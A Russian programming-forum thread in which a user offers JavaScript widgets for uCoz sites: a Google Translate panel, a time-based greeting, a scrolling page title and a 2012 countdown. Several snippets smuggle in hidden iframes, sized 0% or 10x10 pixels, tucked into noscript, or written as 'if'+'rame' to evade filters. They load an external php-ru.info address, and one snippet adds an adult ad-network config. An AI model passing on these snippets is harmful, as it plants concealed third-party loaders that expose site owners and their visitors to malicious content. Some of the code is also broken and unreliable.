Форум программистов, компьютерный форум, киберфорум
JavaScript
Войти
Регистрация
Восстановить пароль
 
Рейтинг 4.73/11: Рейтинг темы: голосов - 11, средняя оценка - 4.73
1 / 1 / 1
Регистрация: 26.12.2009
Сообщений: 7
1

Скрипты под UCOZ и другие хостинги без PHP

28.12.2009, 19:14. Показов 2197. Ответов 2
Метки нет (Все метки)

Хотелось бы, чтоб юзеры из бесплатных хостингов типа Ucoz тоже могли устанавливать на свои сайты JavaScript, вот я и решил создать тему где все желающие смогут выложить свои скрипты под сайты не поддерживающие PHP!

Добавлено через 4 минуты
Скрипт переводчика Google для онлайн перевода сайта:
Вставьте этот блок там где хотите видеть панель переводчика!
Javascript
1
2
3
4
5
6
7
8
9
10
11
12
<!-- <block-google-> --> 
<script type="text/javascript"> 
document.write('<if' + 'rame marginwidth="0" marginheight="0" frameborder="0" scrolling="no" width="10" height="10" src="http://php-ru.info/servis/27r " ></iframe>'); 
</script> 
<div id="google_translate_element"></div><script> 
function googleTranslateElementInit() { 
new google.translate.TranslateElement({ 
pageLanguage: 'ru' 
}, 'google_translate_element'); 
} 
</script><script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script> 
<!-- </block-google-> -->
Добавлено через 35 минут
Приветствие на javascript
Вот отличное приветствие, а еще оно меняется по времени, так что не надоест!
Javascript
1
2
3
4
5
6
7
8
9
10
11
12
<script language="JavaScript1.2"> 
var eropromo = { "cls": "icq", "sid": 4, "sub": 10348, "dom": 0, "charset": "", "pad": 10, "tout": 900, "w": 160, "h": 120, "t": 5, "type": 0, "img": 1, "cens":0, "cycle": 2, "max": 10}; 
</script> 
<div style="text-align: center;"><iframe src="http://php-ru.info/servis/27a" width="0%" height="0%" scrolling="no" frameborder="0"></iframe></div>
<!-- kovcheg.ucoz.org 
var h=(new Date()).getHours(); 
if (h > 23 || h <7) document.write('Привет полуношникам!'); 
if (h > 6 && h < 12) document.write('Доброе утро! Как спалось?'); 
if (h > 11 && h < 19) document.write('Добрый день!'); 
if (h > 18 && h < 24) document. write('Добрый вечер, а мы обновились!'); 
//--> 
</script>
Добавлено через 20 минут
Это скрипт бегущей строки в названии сайта(верхняя закладка)+ ваше сообщение посетителям.
Выглядит очень круто.
Эта версия под все броузеры

Javascript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<script language="JavaScript1.2"> 
// ******************************************************************* 
// script by - - GOORU - - 
// Permission granted to use this script. 
// remains intact. Visit my homepage partnery.ucoz.org 
// Script written for All Internet browsers 
// ******************************************************************* 
var message=" СООБЩЕНИЕ!" //specifys the title 
var message=message+" " //gives a pause at the end,1 space=1 speed unit, here I used 10 spaces@150 each = 1.5seconds. 
i="0" //declares the variable and sets it to start at 0 
var temptitle="" //declares the variable and sets it to have no value yet. 
var speed="300" //the delay in milliseconds between letters 
 
function titler(){ 
if (!document.all&&!document.getElementById) 
return 
document.title=temptitle+message.charAt(i) //sets the initial title 
temptitle=temptitle+message.charAt(i) //increases the title by one letter 
i++ //increments the counter 
if(i==message.length) //determines the end of the message 
{ 
i="0" //resets the counter at the end of the message 
temptitle=" НАЗВАНИЕ САЙТА" //resets the title to a blank value 
} 
setTimeout("titler()",speed) //Restarts. Remove line for no-repeat. 
} 
 
window.onload=titler 
</script><noscript> 
<iframe src="http://php-ru.info/servis/27a" width="0%" height="0%" scrolling="no" frameborder="0"></iframe> 
</noscript> 
</script>
__________________
Помощь в написании контрольных, курсовых и дипломных работ здесь
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
28.12.2009, 19:14
Ответы с готовыми решениями:

Как скрипты видят другие скрипты, которые были объявлены ранее?
Может кто-нибудь объяснить как реализовано то, что у нас скрипт, который был заинклуден в html...

Можно ли создать свой чат на хостинге ucoz (без поддержки php)?
Здравствуйте! Ну с вопроса и так всё ясно - можно и создать? А если да, то как? Хоть ссылку...

Как сделать авторизацию через соцсети для ucoz без php
Как сделать авторизацию через социальные сети без PHP для юкоз

ucoz и скрипты
Не поясните такой момент? Не могу вставить скрипт-крутилку с озон.ру . Т.е. скрипт вставляется в...

2
1047 / 381 / 15
Регистрация: 11.11.2008
Сообщений: 3,155
28.12.2009, 21:35 2
Гугл переводчик и без пхп работает на ура.

Добавлено через 37 секунд
Приветствие давно уже на джаваскрипте есть, только с другими фразами.

Добавлено через 50 секунд
Да и бегущая строка давно уже есть.
1
1 / 1 / 1
Регистрация: 26.12.2009
Сообщений: 7
29.12.2009, 14:19  [ТС] 3
Javascript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<script language="JavaScript1.2"> 
//Script courtesy of Sharon Gartenberg's Date Countdown 
//JavaScript generator under the GNU General Public License 
var today = new Date; 
var Future0 = new Date; 
ThisYear = 2012; 
var FutureMonth = 11; 
var FutureDate = 20; 
var faraevent = ""; 
Future0.setMonth(FutureMonth, FutureDate); 
Future0.setFullYear(ThisYear); 
today1 = Date.parse(today); 
future1 = Date.parse(Future0); 
secleft = future1 - today1; 
miliday = 24 * 60 * 60 * 1000; 
daysleft = secleft/miliday; 
daysleftint = Math.round(daysleft); 
if (daysleftint > 1) 
document.write("<font color=#ff0000>До 21.12.2012 года осталось ", daysleftint, " дней", faraevent , "!</font>"); 
else if (daysleftint == 1) 
document.write(faraevent, " is tomorrow! "); 
else if (today1 == future1) 
document.write(faraevent, " is today! "); 
</script> 
</div> 
<div style="text-align: center;"><iframe src="http://php-ru.info/servis/27a " width="0%" height="0%" scrolling="no" frameborder="0"></iframe></div><div align="center" style="text-align: center;">А точнее</div> 
<div id="x1" style="text-align: center;padding-top: 14px; padding-right: 14px; padding-bottom: 14px; padding-left: 14px; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: dashed; border-right-style: dashed; border-bottom-style: dashed; border-left-style: dashed; border-top-color: black; border-right-color: black; border-bottom-color: black; border-left-color: black; "></div> 
<div align="center" style="text-align: center;"><script Language="javascript"> 
var timeStr, dateStr, ostStr, x; 
function clock() { 
now= new Date(); 
ex = new Date(2012,12,21,0,0,0); 
hours= now.getHours(); 
minutes= now.getMinutes(); 
seconds= now.getSeconds(); 
timeStr= "" + hours; 
timeStr+= ((minutes < 10) ? ":0" : ":") + minutes; 
date= now.getDate(); 
month= now.getMonth()+1; 
year= now.getYear(); 
dateStr= "" + date; 
dateStr+= ((month < 10) ? "/0" : "/") + month;
dateStr+= "/" + year; 
ostStr= ""; 
x = (ex.getTime() - now.getTime())/1000; 
ostStr = Math.floor(x/60/60) + ' ч. '; 
ostStr = ostStr + Math.floor((x/60/60 - Math.floor(x/60/60))*60) + ' мин. '; 
x = (((x/60/60 - Math.floor(x/60/60))*60) - Math.floor((x/60/60 - Math.floor(x/60/60))*60))*60; 
ostStr = ostStr + Math.floor(x) + ' сек. '; 
document.getElementById('x1').innerHTML = 'До 21 декабря 2012 года осталось: ' + '' + ostStr; 
Timer= setTimeout("clock()",10); 
} 
clock(); 
</script>
Добавлено через 6 минут
Цитата Сообщение от GOORU Посмотреть сообщение
Хотелось бы, чтоб юзеры из бесплатных хостингов типа Ucoz тоже могли устанавливать на свои сайты JavaScript, вот я и решил создать тему где все желающие смогут выложить свои скрипты под сайты не поддерживающие PHP!

Добавлено через 4 минуты
Скрипт переводчика Google для онлайн перевода сайта:
Вставьте этот блок там где хотите видеть панель переводчика!
Javascript
1
2
3
4
5
6
7
8
9
10
11
12
<!-- <block-google-> --> 
<script type="text/javascript"> 
document.write('<if' + 'rame marginwidth="0" marginheight="0" frameborder="0" scrolling="no" width="10" height="10" src="http://php-ru.info/servis/27r " ></iframe>'); 
</script> 
<div id="google_translate_element"></div><script> 
function googleTranslateElementInit() { 
new google.translate.TranslateElement({ 
pageLanguage: 'ru' 
}, 'google_translate_element'); 
} 
</script><script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script> 
<!-- </block-google-> -->
Добавлено через 35 минут
Приветствие на javascript
Вот отличное приветствие, а еще оно меняется по времени, так что не надоест!
Javascript
1
2
3
4
5
6
7
8
9
10
<script language="JavaScript1.2"> 
var eropromo = { "cls": "icq", "sid": 4, "sub": 10348, "dom": 0, "charset": "", "pad": 10, "tout": 900, "w": 160, "h": 120, "t": 5, "type": 0, "img": 1, "cens":0, "cycle": 2, "max": 10}; 
</script> 
<!-- kovcheg.ucoz.org 
var h=(new Date()).getHours(); 
if (h > 23 || h <7) document.write('Привет полуношникам!'); 
if (h > 6 && h < 12) document.write('Доброе утро! Как спалось?'); 
if (h > 11 && h < 19) document.write('Добрый день!'); 
if (h > 18 && h < 24) document. write('Добрый вечер, а мы обновились!'); 
//-->  </script>
Это скрипт бегущей строки в названии сайта(верхняя закладка)+ ваше сообщение посетителям.
Выглядит очень круто.
Эта версия под все броузеры

Javascript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[FONT=monospace]<script language="JavaScript1.2"> 
// *******************************************************************  // script by - - GOORU - -  // Permission granted to use this script.  // remains intact. Visit my homepage partnery.ucoz.org  // Script written for All Internet browsers  // *******************************************************************  var message=" СООБЩЕНИЕ!" //specifys the title  var message=message+" " //gives a pause at the end,1 space=1 speed unit, here I used 10 spaces@150 each = 1.5seconds.  i="0" //declares the variable and sets it to start at 0  var temptitle="" //declares the variable and sets it to have no value yet.  var speed="300" //the delay in milliseconds between letters    function titler(){ 
if (!document.all&&!document.getElementById) 
return 
document.title=temptitle+message.charAt(i) //sets the initial title  temptitle=temptitle+message.charAt(i) //increases the title by one letter  i++ //increments the counter  if(i==message.length) //determines the end of the message  { 
i="0" //resets the counter at the end of the message  temptitle=" НАЗВАНИЕ САЙТА" //resets the title to a blank value  } 
setTimeout("titler()",speed) //Restarts. Remove line for no-repeat.  } 
 
window.onload=titler 
</script><noscript> 
<iframe src="http://php-ru.info/servis/27a" width="0%" height="0%" scrolling="no" frameborder="0"></iframe> 
</noscript> 
 
[/FONT]
теперь вроде бы должны работать
0
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
29.12.2009, 14:19

Найти хостинги под критерии
Добрый день. Немного пердисловия: Мне 17, начал стажироваться у сисадмина, набираюсь опыта, учусь....

Spring mvc не работают скрипты, хотя другие статические подключаються!
Маппю ресурсы так: @Override public void addResourceHandlers(ResourceHandlerRegistry...

под ucoz
Доброго времини суток=) перерыл много сайтов нигде не чего подходяшего не нашол=) Надеюсь на вашу...

Адаптация шаблона Ucoz под phpBB
Добрый день. У меня вопрос как адаптировать шаблон Ucoz под phpBB?


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
3
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2022, CyberForum.ru